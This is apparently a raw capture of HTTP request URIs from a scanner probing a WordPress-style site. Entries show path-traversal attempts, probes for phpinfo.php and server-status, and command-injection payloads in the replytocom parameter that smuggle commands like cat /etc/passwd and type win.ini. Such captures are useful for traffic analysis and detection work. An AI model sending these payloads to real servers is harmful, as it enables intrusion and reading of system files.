Packet [10]	Uri [/../]
Packet [11]	Uri [/../../../../../]
Packet [12]	Uri [/./././././././././././././././]
Packet [13]	Uri [/././././././qwerty/.././././././././]
Packet [59]	Uri [/asdfasdfasdfasdfasdf/../]
Packet [61]	Uri [/backup/]
Packet [95]	Uri [/icons/phpinfo.php]
Packet [132]	Uri [/images/phpinfo.php]
Packet [199]	Uri [/noindex/css/phpinfo.php]
Packet [221]	Uri [/noindex/phpinfo.php]
Packet [243]	Uri [/phpinfo.php]
Packet [261]	Uri [/server-status]
Packet [286]	Uri [/web/2022/02/02/hola-mundo/?replytocom=%0A%2Fbin%2Fcat%20%2Fetc%2Fpasswd]
Packet [287]	Uri [/web/2022/02/02/hola-mundo/?replytocom=%0A%2Fusr%2Fsbin%2Fping%20-s%20localhost%209]
Packet [288]	Uri [/web/2022/02/02/hola-mundo/?replytocom=%0Aping%20-c%209%20localhost]
Packet [289]	Uri [/web/2022/02/02/hola-mundo/?replytocom=%0Aping%20-n%209%20localhost]
Packet [290]	Uri [/web/2022/02/02/hola-mundo/?replytocom=%0Atype%20%25SYSTEMROOT%25%5Cwin.ini]
Packet [291]	Uri [/web/2022/02/02/hola-mundo/?replytocom=%0D%0A%2Fbin%2Fcat%20%2Fetc%2Fpasswd]
Packet [292]	Uri [/web/2022/02/02/hola-mundo/?replytocom=%0D%0A%2Fusr%2Fsbin%2Fping%20-s%20localhost%209]
Packet [293]	Uri [/web/2022/02/02/hola-mundo/?replytocom=%0D%0Aping%20-c%209%20localhost]
Packet [294]	Uri [/web/2022/02/02/hola-mundo/?replytocom=%0D%0Aping%20-n%209%20localhost]
Packet [295]	Uri [/web/2022/02/02/hola-mundo/?replytocom=%0D%0Atype%20%25SYSTEMROOT%25%5Cwin.ini]
Packet [306]	Uri [/web/2022/02/02/hola-mundo/?replytocom=%25SYSTEMROOT%25%5Cwin.ini%00]
Packet [307]	Uri [/web/2022/02/02/hola-mundo/?replytocom=%25SYSTEMROOT%25%5Cwin.ini%00.html]
Packet [308]	Uri [/web/2022/02/02/hola-mundo/?replytocom=%26%26%2Fbin%2Fcat%20%2Fetc%2Fpasswd]
